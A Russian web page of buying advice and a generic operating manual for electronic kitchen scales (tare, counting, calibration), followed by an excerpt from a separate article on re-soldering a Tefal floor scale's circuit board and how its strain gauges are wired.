Кухонные весы позволят домашний рецепт отмерить с точностью до граммов, помогут изучать без боязни новые и новые блюда. Типичный прибор шел по цене, к примеру, у Maxwell за 800 рублей. На шкале выставляются фунты, граммы, килограммы или унции, что позволит гибко оперировать с ингредиентами при готовке.

Перед покупкой электронных кухонных весов проще полистать инструкцию. Большинство производителей выкладывает информацию в сеть.

Единожды попробовав, мало кто отказывается. Современные технологии позволят узнать вес с точностью до 1-го грамма, что легко дает отмерить и взвесить 15 листьев лаврового листа. Откроем авторский секрет: при работе с подобного рода специями кладите ингредиенты в чашу посередине, терпеливо подождите, пока кухонные весы проведут подсчет. В Maxwell об окончании операции сигнализирует на дисплее треугольник с жирными точками при вершинах.

Читайте также:  Тензодатчики для весов – выбираем правильно

Что важно для кухонных весов:

  1. Прибор конструкцией корпуса защищен от случайного попадания влаги. К примеру, у затронутых выше Maxwell панель управления сенсорная, не привычная пленка с клавишами, а жесткая пластмасса. Включаются эти кухонные весы по прикосновению руки. Загорается подсветка, понятно, что можно пользоваться.
  2. Для кухонных весов считаем обязательным наличие опции обнуления шкалы. К примеру, ставим стакан, выводим на начальную отметку и досыпаем 100 граммов муки. Это работает и с жидкостями. Пользуемся штатной чашей кухонных весов или заменим иным сосудом.
  3. Удобно, когда кухонные весы автоматически отключаются. У Maxwell это случается через 5 мин бездействия. Когда кухонные весы умеют беречь батарейки, это здорово.
  4. Желательно, чтобы ножки были обрезиненные. На кухне не нужно, чтобы оборудование скользило. Современные весы построены на тензодатчиках, располагающихся в ножках, резина не применяется в напольных моделях. С кухонными по-другому. Взвешиваемая масса не превышает 5 кг, силы упругости сдавливаемой резины не играют решающей роли.
  5. Рекомендуют на информационных порталах брать изделия из стали, в случае с кухонными весами голосуем за пластик. Легкий, моется, пищевые продукты напрямую с полимером не контактируют. Стало быть, преимущества современных материалов проявляются в полной мере. Хранить пластиковые кухонные весы возможно где угодно.
  6. Порой требуется переключение мер. Изысканные рецепты сегодня приходят с запада, где привыкли считать в фунтах и унциях. В результате труд повара по оформлению новой рецептуры облегчается, если на шкале выставить нужные единицы. Возможно незамедлительно переключать фунты и граммы кнопкой и записать результат в уже привычных мерах. Это позволит адаптировать иностранную кухню для российских реалий. Удобно, поверьте! Разумеется, возможность «вольного» обращения нужно проверить в магазине. Батарейки идут в комплекте. Чаще в кухонных весах используются элементы питания ААА (мизинчиковые батарейки) на 1,5 В. Источник энергии зависит во многом от конструкции.
  7. Уверены, что покупать стоит только электронные весы. На практике проверено, что механические за схожую цену плохо (с недостаточной точностью) показывают даже заранее известную массу. О единицах граммов речи не идет. Если взяли механические кухонные весы, знайте, что правильность показаний сильно зависит от того, как отцентрирована продукция на чаше. Использовать неудобно – невозможно обнулить шкалу для используемой емкости, про унции и фунты забудьте.
  8. Предел взвешивания среднестатистических кухонных весов составляет 5 кг. Отдельные модели перекрывают указанный диапазон. Подходящие кухонные весы ищите на Яндекс-маркете, заполнив соответствующий параметр. Перегружать покупку не рекомендуем. Тензодатчики не пострадают, но механическая часть выйдет из строя.

Рекомендуем брать электронные весы, причем не стоит гоняться за ценой. Проверить товар просто. Идите в соседний супермаркет, возьмите пачку печенья граммов на 150 и взвесьте в присутствии консультанта. Разница в показаниях не должна превышать пары граммов.

Если разница больше:

  • Обманули в супермаркете с весом печенья.
  • Весы безбожно врут, стоит выбрать весы другого бренда.

Универсальная инструкция для электронных весов.

Универсальная инструкция к портативным весам.

Меры предосторожности:

  • Никогда не перегружайте весы (не ставьте вес больший, чем предназначен для данной модели.
  • Избегайте любого контакта устройства с высокими и низкими температурами, электронные весы работают лучше при обычной комнатной температуре. Всегда давайте весам акклиматизироваться к нормальной комнатной температуре в течение по крайней мере одного часа перед использованием.
  • Если Вы собираетесь калибровать весы, предварительно подержите их включенными 30-60 секунд до калибровки, чтобы дать внутренним компонентам подготовиться к работе.
  • Держите весы в чистоте. Пыль, грязь, влажность, вибрация, потоки воздуха и близость к другому электронному оборудованию может негативно повлиять на надежность и точность весов.
  • Обращайтесь с осторожностью: аккуратно кладите взвешиваемые предметы на платформу весов, без усилий нажимайте кнопки управления. Старайтесь избегать резких нажатий, больших усилий, грубого обращения, поскольку это может привести к повреждению внутренних датчиков.
  • Избегайте тряски, ударов и падений весов. Это точный инструмент и обращаться с ним нужно с аккуратностью.
  • Работать с весами нужно на ровной, статичной поверхности.

Начало работы с электронными весами:

  1. Поместите весы на ровную, статичную поверхность.
  2. Откройте крышку (если есть).
  3. Включите весы нажатием на кнопку «I/O» или «On/Off».
  4. Включите/выключите подсветку (если требуется) нажатием на кнопку «LIGHT» (данная функция может присутствовать не во всех моделях).
  5. Дождитесь отображения на дисплее нулей (0.00), кнопкой «М» или «Unit» выберите нужную единицу измерения.
  6. Аккуратно положите на весовую платформу взвешиваемые предметы.
  7. Дождитесь когда весы будут стабильно отображать показания.
  8. Для подсчета числа одинаковых предметов используйте кнопку «PCS» (данная функция может присутствовать не во всех моделях).
  9. Выключите весы кнопкой «I/O» или «On/Off».

Функция Тара клавиша «T»:

  1. Включите весы, как описано выше.
  2. Поместите «тару» на платформу.
  3. Нажмите клавишу «TARE» (выбор тары) и подождите, пока не отобразится [0.00]
  4. После этого можно класть на весы взвешиваемые предметы.

Функция Подсчёта клавиша «PSC» (присутствует не во всех моделях):

  1. Нажмите и удерживайте кнопку «PCS» (кнопка подсчета) в течение двух секунд, до тех пор пока не появится «100».
  2. Нажмите кнопку «MODE» (выбор единиц измерения веса), и вы увидите «25, 50, 75, 100». Пожалуйста, выберите число взвешиваемых предметов.
  3. Затем положите соответствующее количество предметов, которые Вы собираетесь считать образцом. 
  4. Затем нажмите «PCS» (кнопка подсчета) для подтверждения.
  5. Уберите образец.
  6. Теперь вы можете положить предметы, которые вы хотите посчитать по центру платформы, и на дисплее отобразится их количество.

Функция Калибровки клавиша «M» (MODE) или «CAL»:

  1. Включите весы, нажав «ON/OFF» (кнопка включения/выключения).
  2. Нажмите кнопку «M» (MODE) или «CAL» (функция калибровки) и удерживайте её до того, пока на дисплее не отобразится «CAL».
  3. Снова нажмите «M» (MODE) или «CAL» (функция калибровки), «CAL» начнёт мигать, а затем покажет вес, который нужно поставить на платформу.
  4. Положите нужный вес на платформу и подождите от 3 до 4 секунд, пока на экране не появится «PASS».
  5. Удалите вес и нажмите «ON/OFF» (кнопка включения/выключения), чтобы выключить весы.

На этом калибровка закончена. 

Если калибровка прошла неудачно, то на экране будет отображаться надпись «FAIL».

 Пожалуйста, повторите шаги 1-5 функции калибровки.

Благодарим Вас за покупку электронных весов на сайте kuhonnij.ru

Вернуться к списку публикаций

Устранение неисправности напольных весов

Проверка батарейки, проводов и тензодатчиков весов не выявила неисправности. Осталось только две гипотезы, неисправен микропроцессор или холодная пайка радиоэлементов на печатной плате.

Электронная плата весов Tefal 5242

Проверить микропроцессор в домашних условиях сложно, так как надо иметь специальный программатор, программное обеспечение и умение с ним работать. А вот с некачественной пайкой при наличии паяльника разобраться не сложно. Поэтому были пропаяны паяльником все точки припайки к плате радиоэлементов.

Электронные весы Tefal 5242 отремонтированы

После этого весы были проверены. Несмотря на пессимистический прогноз, они стали правильно и стабильно показывать вес. Стало очевидным, что поломка электронных напольных весов для взвешивания веса человека заключалась в некачественной пайке одного из элементов схемы, установленного на печатной плате.

Как видите, современные электронные весы, устроены просто, и при желании любой домашний мастер, даже не имеющий опыта в ремонте весов, может их отремонтировать.

Электрическая схема

Электрическая схема весов простая и представляет собой микропроцессор, к которому подключено четыре тензодатчика и цифровой жидкокристаллический индикатор. Для питания схемы служит батарейка.

Электрическая схема весов Tefal 5242

Обычно в электронных весах устанавливают четыре тензодатчика, по одному под каждой ножкой. Тензодатчик представляет собой наклеенную на металлическую пластину полоску пленки из материала, чувствительного к деформации. При изгибании пластины пленка тоже изгибается и ее сопротивление изменяется.

Полосок может быть по два отрезка, под одной ножкой, или четыре. Включаются они обычно по мостовой схеме, что повышает точность измерений. В данных весах установлено по две пленки в каждой ножке, включенных последовательно. От точки их соединения идет на микропроцессор дополнительный провод. Сопротивление каждого тензодатчика составляет 1 кОм. Поэтому тензодатчики легко проверить на обрыв с помощью мультиметра.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Adblock
detector